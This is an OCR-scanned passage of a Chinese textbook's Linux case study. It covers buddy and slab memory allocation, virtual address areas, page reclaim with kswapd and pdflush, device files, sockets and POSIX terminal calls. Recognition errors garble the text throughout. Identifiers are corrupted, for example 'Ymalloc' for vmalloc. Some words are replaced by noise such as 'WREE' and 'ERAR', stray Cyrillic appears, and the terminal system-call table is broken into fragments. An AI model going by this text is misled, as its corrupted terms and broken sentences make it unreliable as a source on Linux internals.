Linux 支 持 多 种 内 存 分 配 机 制 。 分 配 物理 内 存 页 框 的 主要 机 制 是 页 画 分 配器 ， 它 使 用 了 著名 的 伙 件 算法 。 

管理 一 块 内 存 的 基本 思想 如 下 。 刚 开始 ， 内 存 由 一 块 连续 的 片段 组 成 ， 图 10-17a 的 简单 例子 中 是 64 
个 页 面 。 当 一 个 内 存 请 求 到 达 时 ， 首 先 上 命 人 到 2 的 矫 ， 比 如 8 个 页 面 。 然 后 整个 内 存 块 被 分 割 成 两 半 ， 
如 图 b 所 示 。 因 为 这 些 片段 还 是 太 大 了 ， 较 低 的 片段 被 再 次 二 分 (c)， 然 后 再 二 分 (d)。 现 在 我 们 有 一 
块 大 小 合适 的 内 存 ， 因 此 把 它 分 配给 请 求 者 ， 如 图 d 所 示 。 
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10-17 伙伴 算法 的 操作 


现在 假定 8 个 页 面 的 第 二 个 请 求 到 达 了 。 这 个 请 求 有 (e) 直接 满足 了 。 此 时 4 个 页 面 的 第 三 个 请 求 
到 达 了 。 最 小 可 用 的 块 被 分 割 (f) ， 然 后 其 一 半 被 分 配 (g) 。 接 下 来 ，8 页 面 的 第 二 个 块 被 释放 (h) 。 
最 后 ，8 页 面 的 另 一 个 块 也 被 释放 。 因 为 刚刚 释放 的 两 个 邻接 的 8 页 面 块 来 自 同一 个 16 页 面 块 ， 它 们 合并 
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起 来 得 到 一 个 16 页 面 的 块 (i)。 

Linux 用 伙伴 算法 管理 内 存 ， 同 时 有 一 些 附加 特性 。 它 有 个 数组 ， 其 中 的 第 一 个 元 素 是 大 小 为 1 个 单 
位 的 内 存 块 列表 的 头 部 ， 第 二 个 元 素 是 大 小 为 2 个 单位 的 内 存 块 列表 的 头 部 ， 下 一 个 是 大 小 为 4 个 单位 的 
内 存 块 列表 的 头 部 ， 以 此 类 推 。 通 过 这 种 方法 ， 任 何 2 的 等 次 大 小 的 块 都 可 以 快速 找到 。 

这 个 算法 导致 了 大 量 的 内 部 碎片 ， 因 为 如 果 想 要 65 页 面 的 块 ， 必 须要 请 求 并 且 得 到 一 个 128 页 面 
的 块 。 

为 了 缓解 这 个 问题 ，Linux 有 另 一 个 内 存 分 配器 ，slab 分 配器 。 它 使 用 伙伴 算法 获得 内 存 块 ， 但 是 之 
后 从 其 中 切 出 slab (更 小 的 单元 ) 并 且 分 别 进行 管理 。 

因为 内 核 频繁 地 创建 和 撤销 一 定 类 型 的 对 象 (如 task_struct) ， 它 使 用 了 对 章 缓 存 。 这 些 缓存 由 指向 
一 个 或 多 个 slab 的 指针 组 成 ， 而 slab 可 以 存储 大 量 相同 类 型 的 对 象 。 每 个 slab 要 么 是 满 的 ， 要 么 是 部 分 满 
的 ， 要 么 是 空 的 。 

例如 ， 当 内 核 需要 分 配 一 个 新 的 进程 描述 符 (一 个 新 的 task_struct) 的 时 候 ， 它 在 task 结 构 的 对 象 

缓存 中 寻找 ， 首 先 试图 找 一 个 部 分 满 的 slab 并 且 在 那里 分 配 一 个 新 的 task_struct 对 象 。 如 果 没 有 这 样 的 
slab 可 用 ， 就 在 空闲 slab 列 表 中 查找 。 最 后 ， 如 果 必 要 ， 它 会 分 配 一 个 新 的 slab， 把 新 的 task 结 构 放 在 那 
里 ， 同 时 把 该 slab 连 接 到 task 结 构 对 象 缓存 中 。 在 内 核 地 址 空间 分 配 连 续 的 内 存 区 域 的 kmalloc 内 核 服务 ， 
实际 上 就 是 建立 在 slab 和 对 象 缓存 接口 之 上 的 。 
个 内 存 分 配器 Ymalloc 也 是 可 用 的 ， 并 且 用 于 那些 仅仅 需要 虚拟 地 址 空间 连续 的 请 求 。 实际 上 ， 
这 一 点 对 于 大 部 分 内 存 分 配 是 成 立 的 。 一 个 例外 是 设备 ， 它 位 于 内 存 总 线 和 内 存 管理 单元 的 另 一 端 ， 因 
此 并 不 理解 虚拟 地 址 。 然 而 ，vmalloc 的 使 用 导致 一 些 性 能 的 损失 ， 主要 用 于 分 配 大 量 连续 虚拟 地 址 空 
间 ， 例 如 动态 插入 内 核 模块 。 所 有 这 些 内 存 分 配器 都 是 继承 自 System V 中 的 那些 分 配器 。 

3. 虚拟 地 址 空间 表示 

虚拟 地 址 空间 被 分 割 成 同 构 连续 页 面 对 齐 的 区 域 。 也 就 是 说 ， 每 个 区 域 由 一 系列 连续 的 具有 相同 保 
护 和 分 页 属性 的 页 面 组 成 。 代 码 段 和 映射 文件 就 是 区 (area) 的 例子 ( 见 图 10-15)。 在 虚拟 地 址 空间 的 
区 之 间 可 以 有 空 阶 。 所 有 对 这 些 空隙 的 引用 都 会 导致 一 个 严重 的 页 面 故障 。 页 大 小 是 确定 的 ， 例 如 
Pentium 是 4KB 而 Alpha 是 8KB。Pentium 支 持 4MB 的 页 框 ， Linux 可 以 支持 4MB 的 大 页 框 。 而 且 ， 在 PAE 
(物理 地 址 扩展 ) 模式 下 ，2MB 的 页 大 小 是 支持 的 。 在 一 些 32 位 机 器 上 常用 PAE 来 增加 进程 地 址 空间 ， 
使 之 超过 4GB。 

在 内 核 中 ， 每 个 区 是 用 vm_area_struct 项 来 描述 的 。 一 个 进程 的 所 有 vm_area_struct 用 一 个 链表 链接 
在 一 起 ， 并 且 按 照 虚拟 地 址 排序 以 便 可 以 找到 所 有 的 页 面 。 当 这 个 链表 太 长 时 (多 于 32 项 ) ， 就 创建 一 
个 树 来 加 速 搜索 。vm_area_struct 项 列 出 了 该 区 的 属性 。 这 些 属性 包括 : 保护 模式 (如 ， 只 读 或 者 可 读 
可 写 )、 是 否 固定 在 内 存 中 (不 可 换 出 )、 朝 向 哪个 方向 生长 (数据 段 向 上 长 ， 栈 段 向 下 长 ) 。 

Ym-_area_struct 也 记录 该 区 是 私有 的 还 是 跟 一 个 或 多 个 其 他 进程 共享 的 。fork 之 后 ，Linux 为 子 进程 
复制 一 份 区 链表 ， 但 是 让 父子 进程 指向 相同 的 页 表 。 区 被 标记 为 可 读 可 写 ， 但 是 页 面 却 被 标记 为 只 读 。 
如 果 任 何 一 个 进程 试图 写 页 面 ， 就 会 产生 一 个 保护 故障 ， 此 时 内 核发 现 该 内 存 区 逻辑 上 是 可 写 的 ,但 是 
页 面 却 不 是 ， 因 此 它 把 该 页 面 的 一 个 副本 给 当前 进程 同时 标记 为 可 读 可 写 。 这 个 机 制 就 说 明了 写 时 复制 
是 如 何 实现 的 。 

Ym_area_struct 也 记录 该 区 是 否 在 磁盘 上 有 备份 存储 ， 如 果 有 ， 在 什么 地 方 。 代码 段 把 可 执行 二 进 
制 文件 作为 备份 存储 ， 内 存 映射 文件 把 磁盘 文件 作为 备份 存储 。 其 他 区 ， 如 栈 ， 直 到 它们 不 得 不 被 换 出 ， 
否则 没有 备份 存储 被 分 配 。 

一 个 顶层 内 存 描述 符 mm_struct 收 集 属于 一 个 地 址 空间 的 所 有 虚拟 内 存 区 相关 的 信息 ， 还 有 关于 不 
同 段 (代码 ， 数 据 ， 栈 ) 和 用 户 共享 地 址 空间 的 信息 等 。 一 个 地 址 空间 的 所 有 vm_area_struct 元 素 可 以 
通过 内 存 描述 符 用 两 种 方式 访问 。 首 先 ， 它 们 是 按照 虚拟 地 址 顺序 组 织 在 链表 中 的 。 这 种 方式 的 有 用 之 
处 是 : 当 所 有 的 虚拟 地 址 区 需要 被 访问 时 ， 或 者 当 内 核查 找 分 配 一 个 指定 大 小 的 虚拟 内 存 区 域 时 。 此 外 ， 
vm-area_struct 项 目 被 组 织 成 二 又“ 红 黑 ” 树 (一 种 为 了 快速 查找 而 优化 的 数据 结构 )。 这 种 方法 用 于 访 
间 一 个 指定 的 虚拟 内 存 地 址 。 为 了 能 够 用 这 两 种 方法 访问 进程 地 址 空间 的 元 素 ， Linux 为 每 个 进程 使 用 
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了 更 多 的 状态 ， 但 是 却 允 许 不 同 的 内 核 操 作 来 使 用 这 些 访问 方法 ， 这 对 进程 而 言 更 加 高 效 。 


10.4.4 Linux 中 的 分 页 

早期 的 UNIX 系 统 ， 每 当 所 有 的 活动 进程 不 能 容纳 在 物理 内 存 中 时 就 用 一 个 交换 进程 在 内 存 和 磁盘 
之 间 移动 整个 进程 。Linux 跟 其 他 现代 UNIX 版 本 一 样 ， 不 再 移动 整个 进程 了 。 内 存 管理 单元 是 一 个 页 ， 
并 且 几 乎 所 有 的 内 存 管理 部 件 以 页 为 操作 粒度 。 交 换 子 系统 也 是 以 页 为 操作 粒度 的 ， 并 且 跟 页 框 回收 算 
法 紧 炮 合 在 一 起 。 这 个 后 面 会 给 予 描述 。 

Linux 分 页 背后 的 基本 思想 是 简单 的 : 为 了 运行 ， 一 个 进程 并 不 需要 完全 在 内 存 中 。 实 际 上 所 需要 
的 是 用 户 结构 和 页 表 。 如 果 这 些 被 换 进 内 存 ， 那 么 进程 被 认为 是 “在 内 存 中 "， 可 以 被 调度 运行 了 。 代 
码 、 数 据 和 栈 段 的 页 面 是 动态 载 和 的， 仅仅 是 在 它们 被 引用 的 时 候 。 如 果 用 户 结构 和 页 表 不 在 内 存 中 ， 
直到 交换 器 把 它们 载 人 内 存 进程 才能 运行 。 

分 页 是 一 部 分 由 内 核实 现 而 一 部 分 由 一 个 新 的 进程 ， 页 面 守护 进程 ， 实 现 的 。 页 面 守护 进程 是 进程 
2 (进程 0 是 idle 进 程 ， 传 统 上 称 为 交换 器 ， 而 进程 1 是 init， 如 图 10-11 所 示 )。 跟 所 有 守护 进程 一 样 ， 页 
面 守护 进程 周期 性 地 运行 。 一 旦 唤醒 ， 它 主动 查找 是 否 有 工作 要 干 。 如 果 它 发 现 空闲 页 面 数量 太 少 ， 就 
开始 释放 更 多 的 页 面 。 

Linux 是 一 个 请 求 换 页 系统 ， 没 有 预 分 页 和 工作 集 的 概念 (尽管 有 个 系统 调用 ， 其 中 用 户 可 以 给 系 
统一 个 提示 将 要 使 用 某 个 页 面 ， 希 望 需要 的 时 候 页 面 在 内 存 中 )。 代 码 段 和 映射 文件 换 页 到 它们 各 自在 
磁盘 上 的 文件 中 。 所 有 其 他 的 都 被 换 页 到 分 页 分 区 (WREE) 或 者 一 个 固定 长 度 的 分 页 文件 ， 叫 做 交 
换 区 。 分 页 文件 可 以 被 动态 地 添加 或 者 删除 ， 并 且 每 个 都 有 一 个 优先 级 。 换 页 到 一 个 独立 的 分 区 并 且 像 
一 个 原始 设备 那样 访问 的 这 种 方式 要 比 换 页 到 一 个 文件 的 方式 更 加 高 效 。 有 多 个 原因 : 首先 ， 文 件 块 和 
磁盘 块 的 映射 不 需要 了 (节省 了 磁盘 1/O 读 间接 块 ) ， 其次， 物理 写 可 以 是 任意 大 小 的 ， 并 不 仅仅 是 文 
件 块 大 小 ， 第 三 ， 一 个 页 总 是 被 连续 地 写 到 磁盘 ， 用 一 个 分 页 文件 ， 也 许 是 或 者 也 许 不 是 这 样 的 。 

页 面 只 有 在 需要 的 时 候 才 在 分 页 设备 或 者 分 区 上 被 分 配 。 每 个 设备 和 文件 由 一 个 位 图 开始 说 明 哪些 
页 面 是 空 阴 的。 当 一 个 没有 备份 存储 的 页 面 必须 换 出 的 时 候 ， 仍 有 空闲 空间 的 最 高 优先 级 的 分 页 分 区 或 
者 文件 被 选中 并 且 在 其 上 面 分 配 一 个 页 面 。 正 常情 况 下， 分 页 分 区 (EEE) 拥有 比 任何 分 页 文件 更 高 
的 优先 级 。 页 表 被 及 时 更 新 以 反映 页 面 已 经 不 在 内 存 了 (如 ，page-not-present 位 被 设置 ) 同时 磁盘 位 置 
被 写 入 到 页 表 项 。 

页 面 置换 算法 

页 面 替换 是 这 样 工作 的 。Linux 试 图 保留 一 些 空闲 页 面 ， 这 样 可 以 在 需要 的 时 候 分 配 它们 。 当 然 ， 
这 个 页 面 池 必须 不 断 地 加 以 补充 。PFRA (页 框 回 收 算法 ) 算法 展示 了 它 是 如 何 发 生 的 。 

首先 ，Linux 区 分 四 种 不 同 的 页 面 : 不 可 回收 的 (unreclaimable)、 可 交换 的 (swappable)、 可 同步 
的 (syncable)、 可 丢弃 的 (discardable)。 不 可 回收 页 面包 括 保留 或 者 锁定 页 面 、 内 核 态 栈 等 ， 不 会 被 
换 出 页 面 。 可 交换 页 必须 在 回收 之 前 写 回 到 交换 区 或 者 分 页 磁盘 分 区 。 可 同步 的 页 面 如 果 被 标记 为 dirty 
就 必须 要 写 回 到 磁盘 。 最 后 ， 可 丢弃 的 页 面 可 以 被 立即 回收 。 

在 启动 的 时 候 ，init 开 启 一 个 页 面 守护 进程 kswapd (每 个 内 存 节点 都 有 一 个 ) ， 并 且 配置 它们 能 周期 
性 运行 。 每 次 kswapd 被 唤醒 ， 它 通过 比较 每 个 内 存 区 域 的 高 低 水 位 来 检查 是 否 有 足够 的 空闲 页 面 可 用 。 
如 果 有 足够 的 空闲 页 面 ， 它 就 继续 有 睡眠。 当然 它 也 可 以 在 需要 更 多 页 面 时 被 提前 唤醒 。 如 果 任 何 内 存 区 
域 的 可 用 空间 低 于 一 个 阔 值 ，kswapd 初 始 化 页 框 回收 算法 。 在 每 次 运行 过 程 中 ， 仅 有 一 个 确定 数目 的 页 
面 被 回收 ， 典 型 值 是 32。 这 个 值 是 受 限 的 ， 以 控制 1O 压 力 (由 PFRA 操 作 导致 的 磁盘 写 的 次 数 ) 。 回 收 
页 面 的 数量 和 扫描 页 面 的 总 数量 是 可 配置 的 参数 。 

每 次 PFRA 执 行 ， 它 首先 回收 容易 的 页 面 ， 然 后 处 理 更 难 的 。 可 丢弃 页 面 和 未 被 引用 的 页 面 都 是 可 
以 被 立即 回收 的 ， 同 时 把 它们 添加 到 区 域 的 空闲 链表 中 。 接 着 它 查找 有 备份 存储 同时 近期 未 被 使 用 的 页 
面 ， 使 用 一 个 类 似 于 时 钟 的 算法 。 再 后 来 就 是 用 户 使 用 不 多 的 共享 页 面 。 共 享 页 面 带 来 的 挑战 是 ， 如 果 
一 个 页 面 被 回收 ， 那 么 所 有 共享 了 该 页 面 的 所 有 地 址 空间 的 页 表 都 要 同步 更 新 。Linux 维 护 高 效 的 类 树 
数据 结构 来 方便 地 找到 一 个 共享 页 面 的 所 有 使 用 者 。 普 通用 户 页 面 在 此 之 后 被 查找 ， 如 果 被 选中 换 出 ， 
它们 必须 被 调度 写 人 交换 区 。 系 统 的 swappiness, 即 有 备份 存储 的 页 面 和 在 PFRA 中 被 换 出 的 页 面 的 比率 ， 
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是 该 算法 的 一 个 可 调 参数 。 最 后 ， 如 果 一 个 页 是 无 效 的 、 不 在 内 存 、 共 享 、 锁 定 在 内 存 或 者 拥有 DMA， 
那么 它 被 跳 过 。 

PFRA 用 一 个 类 似 时 钟 的 算法 来 选择 旧 页 面 换 出 。 这 个 算法 的 核心 是 一 个 循环 ， 它 扫描 每 个 区 域 的 
活动 和 非 活动 列表 ， 试 图 按照 不 同 的 紧迫 程度 回收 不 同类 型 的 页 面 。 紧 迫 性 数值 作为 一 个 参数 传递 给 该 
过 程 ， 说 明 花 费 多 大 的 代价 来 回收 一 此 页面。 通常 ， 这 意味 着 在 放弃 之 前 检查 多 少 个 页 面 。 

在 PFRA 期 间 ， 页 面 按照 图 10-18 描 述 的 方式 在 活 
动 和 非 活动 列表 之 间 移 来 移 去 。 为 了 维护 一 些 启发 并 
且 尽量 找 出 没有 被 引用 的 和 近期 不 可 能 被 使 用 的 页 面 ， 
PFRA 为 每 个 页 面 维护 两 个 标记 : 活动 / 非 活动 和 是 否 被 
引用 。 这 两 个 标记 构成 四 种 状态 ， 如 图 10-18 所 示 。 在 
对 一 个 页 面 集合 的 第 一 遍 扫描 中 ，PFRA 首 先 清除 它们 
的 引用 位 。 如 果 在 第 二 次 运行 期 间 确 定 它 已 经 被 引用 ， 
则 把 它 提 升 到 另 一 个 状态 ， 这 样 就 不 太 可 能 回收 它 了 。 
否则 ， 将 该 页 面 移动 到 一 个 更 可 能 被 回收 的 状态 。 poe We ek 

处 在 非 活动 列表 上 的 页 面 ， 自 从 上 次 检查 未 被 引 PG _referenced = 1 PG _referenced = 1 
用 过 ， 故 而 是 移出 的 最 佳 候选 。 有 些 页 面 的 PG_active 
和 PG_referenced 都 被 置 为 0， 如 图 10-18。 然 而 ， 如 果 
需要 ， 处 于 其 他 状态 的 页 面 也 可 能 会 被 回收 。 图 10-18 
中 的 重 装 箭头 就 说 明 这 个 事实 。 

PFRA 维 护 一 些 页 面 ， 尽 管 可 能 已 经 被 引用 但 在 非 活动 列表 中 ， 其 原因 是 为 了 避免 如 下 的 情形 。 考 
虚 一 个 进程 周期 性 访问 不 同 的 页 面 ， 比 如 周期 为 1 个 小 时 。 从 最 后 一 次 循环 开始 被 访问 的 页 面 会 设置 其 
引用 标志 位 。 然 而 ， 接 下 来 的 一 个 小 时 里 不 再 使 用 它 ， 没有 理由 不 考虑 把 它 作为 一 个 回收 的 候选 。 

我 们 还 没有 提 及 的 内 存 管理 系统 的 一 个 方面 是 另 一 个 守护 进程 pdflush， 实 际 -就 是 一 组 后 台 守 护 线 
程 。pdflush 线 程 要 么 (1) 周期 性 醒 来 (通常 是 每 500ms)， 把 非常 昌 的 “ 脏 (dirty)” 页 面 写 回 到 磁盘 ， 
要 么 (2) 当 可 用 的 内 存 水 平 下 降 到 一 个 阅 值 时 由 内 核 显 式 唤醒 ， 把 页 面 缓存 的 “ 脏 ” 页 面 写 回 到 磁盘 。 
ERAR (laptop mode) 下 ， 为 了 保留 电池 寿命 ， 每 次 pdflush 线 程 醒 来 ，“ 脏 ” 页 面 就 被 写 到 磁盘 。 
“ 脏 ” 页 面 也 可 以 通过 显 式 的 同步 请 求 写 出 到 磁盘 ， 比 如 通过 系统 调用 sync、 fsync 或 者 fdatasync。 #7 
早 的 Linux 版 本 使 用 两 个 单独 的 守护 进程 kupdate， 用 于 写 回 旧 页 面 ，bdflush， 用 于 在 低 内 存 的 情况 下 
写 回 页 面 。 在 2.4 版 本 内 核 中 这 个 功能 被 整合 到 pdflush 线 程 当中 了 。 选择 多 线程 是 为 了 隐藏 长 的 磁盘 延 
5, 

10.5 Linux 中 的 I/O 系 统 

Linux 和 其 他 的 UNIX 系 统一 样 ，IO 系 统 都 相当 的 简单 明了 。 基 本 上 ， 所 有 的 MO 设备 都 被 当 作文 件 
来 处 理 ， 并 且 通 过 与 访问 所 有 文件 同样 的 read 和 write 系统 调用 来 访问 。 在 某 些 情况 下 ， 必 须 通过 一 个 特 
殊 的 系统 调用 来 设置 设备 的 参数 。 我 们 会 在 下 面 的 章节 中 学 习 这 些 细节 。 

10.5.1 基本 概念 

像 所 有 的 计算 机 一 样 ， 运 行 Linux 的 计算 机 具有 磁盘 、 打 印 机 、 网 络 等 1O 设 备 。 需 要 一 些 策略 才能 
使 程序 能 够 访问 这 些 设备 。 有 很 多 不 同 的 方法 都 可 以 达到 目的 ， Linux 把 设备 当 作 一 种 特殊 文件 整合 到 
文件 系统 中 。 每 个 1/0 设 备 都 被 分 配 了 一 条 路 径 ， 通 常 在 /dev 目 录 下 。 例 如 ; 一 个 磁盘 的 路 径 可 能 是 
“Jdevw/hd1”， 一 个 打印 机 的 路 径 可 能 是 “/dev/lp"， 网 络 的 路 径 可 能 是 “/dev/net”。 

可 以 用 与 访问 其 他 普通 文件 相同 的 方式 来 访问 这 些 特殊 文件 。 不 需要 特殊 的 命令 或 者 系统 调用 。 常 
用 的 open、read、write 等 系统 调用 就 够 用 了 。 例 如 ， 下面 的 命令 

cp file /dev/Ip 


把 文件 “file” 复 制 到 打印 机 “/dev/lp”"， 然 后 开始 打印 (假设 用 户 具有 访问 “/dev/lp” 的 权限 )。 程 序 能 
够 像 操作 普通 文件 那样 打开 、 读 、 写 特殊 文件 。 实 际 上 ， 上 面 的 “cp” 命令 甚至 不 知道 是 要 打印 “file” 


非 活动 活动 


图 10-18 页 框 置换 算法 中 考虑 的 页 面 状态 
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文件 。 通 过 这 种 方法 ， 不 需要 任何 特殊 的 机 制 就 能 进行 IO。 

特殊 文件 (设备 ) 分 为 两 类 ， 块 特殊 文件 和 字符 特殊 文件 。 一 个 块 特殊 文件 由 一 组 具有 编号 的 块 组 
成 。 块 特殊 文件 的 主要 特性 是 : 每 一 个 块 都 能 够 被 独立 地 寻 址 和 访问 。 也 就 是 说 ， 一 个 程序 能 够 打开 一 
个 块 特殊 文件 ， 并 且 不 用 读 第 0 块 到 第 123 块 就 能 够 读 第 124 块 。 磁 盘 就 是 块 特殊 文件 的 典型 应 用 。 

字符 特 珠 文件 通常 用 于 表示 输入 和 和 输出 字符 流 的 设备 。 键 盘 、 打 印 机 、 网 络 、 鼠 标 、 绘 图 机 以 及 大 
部 分 接受 用 户 数据 或 向 用 户 输出 数据 的 设备 都 使 用 字符 特殊 文件 来 表示 。 访 问 一 个 鼠标 的 124 块 是 不 可 
能 的 (其 至 是 无 意义 的 ) 。 

每 个 特殊 文件 都 和 一 个 处 理 其 对 应 设备 的 设备 驱动 相关 联 。 每 个 驱动 程序 都 通过 一 个 主 设备 号 来 标 
只 。 如 果 一 个 驱动 程序 支持 多 个 设备 ， 如 ， 相 同类 型 的 两 个 磁盘 ， 每 个 磁盘 使 用 一 个 次 设备 号 来 标识 。 
主 设备 号 和 次 设备 号 结合 在 一 起 能 够 惟一 地 确定 每 个 LO 设备 。 在 很 少 的 情况 下 ， 一 个 单独 的 驱动 程序 
处 理 两 种 关系 密切 的 设备 。 比 如 : 与 “/dev/tty” 联 合 的 驱动 程序 同时 控制 着 键盘 和 显示 器 ， 这 两 种 设备 
通常 被 认为 是 一 种 设备 ， 即 终端 。 

大 部 分 的 字符 特殊 文件 都 不 能 够 被 随机 访问 , 因此 它们 通常 需要 用 不 同 于 块 特殊 文件 的 方式 来 控制 。 
比如 ， 由 键盘 上 键入 输入 字符 并 显示 在 显示 器 上 。 当 一 个 用 户 键入 了 一 个 错误 的 字符 ， 并 且 想 取消 键入 
的 最 后 一 个 字符 时 ， 他 敲 击 其 他 的 键 。 有 人 喜欢 使 用 “backspace” 回 退 键 ， 也 有 人 喜欢 “del” 删 除 键 。 
类 似 地 ， 为 了 取消 刚 键入 的 一 行 字符 ， 也 有 很 多 方法 。 传 统 的 方法 是 输入 “@"， 但 是 随 着 e-mail 的 传播 
(在 电子 邮件 地 址 中 使 用 @)， 一 些 系统 使 用 “CTRL+U” 或 者 其 他 字符 来 达到 目的 。 同 样 的 ， 为 了 中 断 
正在 运行 的 程序 ， 需 要 使 用 一 些 特殊 的 键 。 不 同 的 人 有 不 同 的 偏爱 。 “CTRL+C” 是 常用 的 方法 ， 但 不 
是 惟一 的 。 

Linux 允 许 用 户 自 定义 这 些 特殊 的 功能 ， 而 不 是 强迫 每 个 人 使 用 系统 选择 的 那 种 。Linux 提 供 了 一 个 
专门 的 系统 调用 来 设置 这 些 选 项 。 这 个 系统 调用 也 处 理 tab 扩 展 ， 字 符 输出 有 效 、 失 效 ， 回 车 和 换行 之 间 
的 转换 等 类 似 的 功能 。 这 个 系统 调用 不 能 用 于 普通 文件 和 块 特殊 文件 。 


10.5.2 网 络 

LO 的 另外 一 个 例子 是 网 络 ， 由 Berkeley UNIX 首 创 并 在 Linux 中 差不多 原封 不 动 引 入 。 在 Berkeley 的 
设计 中 ， 关 键 概 念 是 套 接 字 (socket), 发 送 进程 接收 进程 
套 接 字 与 邮 简 和 墙壁 上 的 电话 插座 是 类 


似 的 ， 因 为 套 接 字 允 许 用 户 连接 到 网 
络 ， 正 如 邮 简 允许 用 户 连 接 到 邮政 系 
统 ， 墙 壁 上 的 电话 插座 允许 用 户 插入 电 
话 并 且 连 接 到 电话 系统 。 套 接 字 的 位 置 
见 图 10-19。 套 接 字 可 以 被 动态 创建 和 
销毁 。 创 建 一 个 套 接 字 成 功 后 ， 系 统 返 
回 一 个 文件 描述 符 。 创 建 连接 、 读 数据 、 
写 数据 、 解 除 连 接 时 要 用 到 这 个 文件 描 
述 符 。 

每 个 套 接 字 支 持 一 种 特定 的 网 络 类 型 ， 这 在 套 接 字 创建 时 指定 。 最 常用 的 类 型 是 : 

D 可 靠 的 面向 连接 的 字 节 流 。 

2) 可 靠 的 面向 连接 的 数据 包 流 。 

3) 不 可 靠 的 数据 包 传输 。 

第 一 种 套 接 字 类 型 允许 在 不 同 机 器 上 的 两 个 进程 之 间 建 立 一 个 等 同 于 管道 的 连接 。 字 节 从 一 个 端点 
注入 然后 按 注入 的 顺序 从 另外 一 个 端点 流出 。 系 统 保证 所 有 被 传送 的 字 节 都 能 够 到 达 ， 并 且 按 照发 送 时 
的 顺序 到 达 。 

除 保留 了 数据 包 之 间 的 分 界 之 外 ， 第 二 种 类 型 和 第 一 种 是 相同 的 。 如 果 发 送 者 调用 了 5 次 写 操作 ， 
每 次 写 了 512 字 节 ， 而 接收 者 要 接收 2560 字 节 ， 那 么 使 用 第 一 种 类 型 的 套 接 字 ， 接 收 者 接收 一 次 会 立刻 
接收 到 所 有 2560 个 字 节 。 要 是 使 用 第 二 种 类 型 的 套 接 字 ， 接 收 者 一 次 只 能 收 到 512 个 宁 节 ， 而 要 得 到 剩 


用 户 空间 


内 核 空间 


图 10-19 网 络 中 使 用 套 接 字 


笑 例 研究 1: Linux 437 


下 的 数据 ， 还 需要 再 进行 4 次 调用 。 用 户 可 以 使 用 第 三 种 类 型 的 套 接 字 来 访问 原始 网 络 。 这 种 类 型 的 套 
接 字 尤其 适用 于 实时 应 用 和 用 户 想 要 实现 特定 错误 处 理 模式 的 情况 。 数 据 包 可 能 会 丢失 或 者 被 网 络 重 排 
序 。 和 前 两 种 方式 不 同 ， 这 种 方式 没有 任何 保证 。 第 三 种 方式 的 优点 是 有 更 高 的 性 能 ， 而 有 时 候 它 比 可 
靠 性 更 加 重要 (如 在 传输 多 媒体 时 ， 快 速 比 正确 性 更 有 用 ) 。 

在 创建 套 接 字 时 ， 有 一 个 参数 指定 使 用 的 协议 。 对 于 可 靠 字 节 流通 信 来 说 ， 使 用 最 广泛 的 协议 是 
ТСР (传输 榨 制 协议 ) 。 对 于 不 可 靠 数据 包 传输 来 说 ，UDP (用 户 数据 报 协议 ) 是 最 常用 的 协议 。 这 两 
种 协议 都 位 于 IP (互联 网 协议 ) 层 之 上 。 这 些 协 议 都 源 于 美国 国防 部 的 ARPANET， 现 在 成 为 互联 网 的 
基础 。 没 有 可 靠 数据 包 流 类 型 的 通用 协议 。 

在 一 个 套 接 字 能 够 用 于 网 络 通信 之 前 ， 必 须 有 一 个 地 址 与 它 绑 定 。 这 个 地 址 可 以 是 几 个 命名 域 中 的 
一 个 。 最 常用 的 域 为 互联 网 (Intenet) 命名 域 ， 它 在 V4 (第 4 个 版 本 ) 中 使 用 32 位 整数 作为 其 命名 端点 ， 
在 V6 中 使 用 128 位 整数 (V5 是 一 个 实验 系统 ， 从 未 成 为 主流 )。 

一 旦 套 接 字 在 源 计算 机 和 目的 计算 机 都 建立 成 功 ， 则 两 个 计算 机 之 间 可 以 建立 起 一 个 连接 (对 于 面 
向 连接 的 通信 来 说 )。 一 方 在 本 地 套 接 字 上 使 用 一 个 listen 系 统 调用 ， 它 创建 一 个 缓冲 区 并 且 阻 塞 ， 直 到 
数据 到 来 。 另 一 方 使 用 connect 系 统 调用 ， 并 且 把 本 地 套 接 字 的 文件 描述 符 和 远程 套 接 宇 的 地 址 作为 参 
数 传递 进去 。 如 果 远程 一 方 接受 了 此 次 调用 ， 则 系统 在 两 个 套 接 字 之 间 建 立 起 一 个 连接 。 

一 旦 连接 建立 成 功 ， 它 的 功能 就 类 似 于 一 个 管道 。 一 个 进程 可 以 使 用 本 地 套 接 字 的 文件 描述 符 来 从 
中 读 写 数据 。 当 此 连接 不 再 需要 时 ， 可 以 用 常用 的 方式 ， 即 通过 close 系 统 调用 来 关闭 它 。 


10.5.3 Linux 的 输入 /输出 系统 调用 

Linux 系 统 中 的 每 个 UO 设备 部 有 一 个 特殊 文件 与 其 关联 。 大 部 分 的 /0 只 使 用 合适 的 文件 就 可 以 完 
成 ， 并 不 需要 特殊 的 系统 调用 。 然 而 ， 有 时 需要 一 些 设备 专用 的 处 理 。 在 POSIX 之 前 ， 大 部 分 UNIX 系 
统 有 一 个 叫 作 ioctl 的 系统 调用 ， 它 在 特殊 文件 上 执行 大 量 设备 专用 的 操作 。 数 年 之 间 ， 此 系统 调用 已 经 
变 得 非常 混乱 。POSIX 对 其 进行 了 清理 ， 把 它 的 功能 划分 为 主要 面向 终端 设备 的 独立 的 功能 调用 。 在 
Linux 和 现代 UNIX 系 统 中 ， 每 个 功能 调用 是 独立 的 系统 调用 ， 还 是 它们 共享 一 个 单独 的 系统 调用 或 者 其 
他 的 方式 ， 都 是 依赖 于 实现 的 。 Ки ыз == 

在 图 10-20 中 的 前 4 个 系统 调用 用 来 设置 | 函数 调用 | ma | 
和 获取 终端 速度 。 为 输入 和 输出 提供 不 同 的 。 | S=cfsetospeed (&termios,speed) | 设置 输出 速率 
系统 调用 是 因为 一 些 调制 解 调 器 工作 速率 不 。 | scfsetispeed (&termios,speed) (ААЖ 
同 。 例 如 ， 旧 的 可 视图 文系 统 允许 用 户 在 家 | s=cfgetospeed (&termios,speed)| 亲 取 输出 速率 | 
通过 短 请 求 以 75 位 /s 的 上 传 速度 访问 服务 器 |-s=cfatetspeed (8&termios.speed) | 获取 输入 速率 
上 的 公共 数据 ， 而 下 载 速度 为 1200 位 /s。 这 s=tcsetattr (fd,opt,&termios) _ 设置 属性 
个 标准 在 一 段 时 间 内 被 采用 ， 因 为 对 于 家 庭 。 =te9etattr (fd.&termios) знн 
应 用 来 说 ， 答 入 输出 时 都 采用 1200 位 / 秒 则 太 图 10-20 管理 终端 的 主要 POSIX 系 统 调用 
昂贵 了 。 网 络 世界 中 的 时 代 已 经 改变 了 。 不 
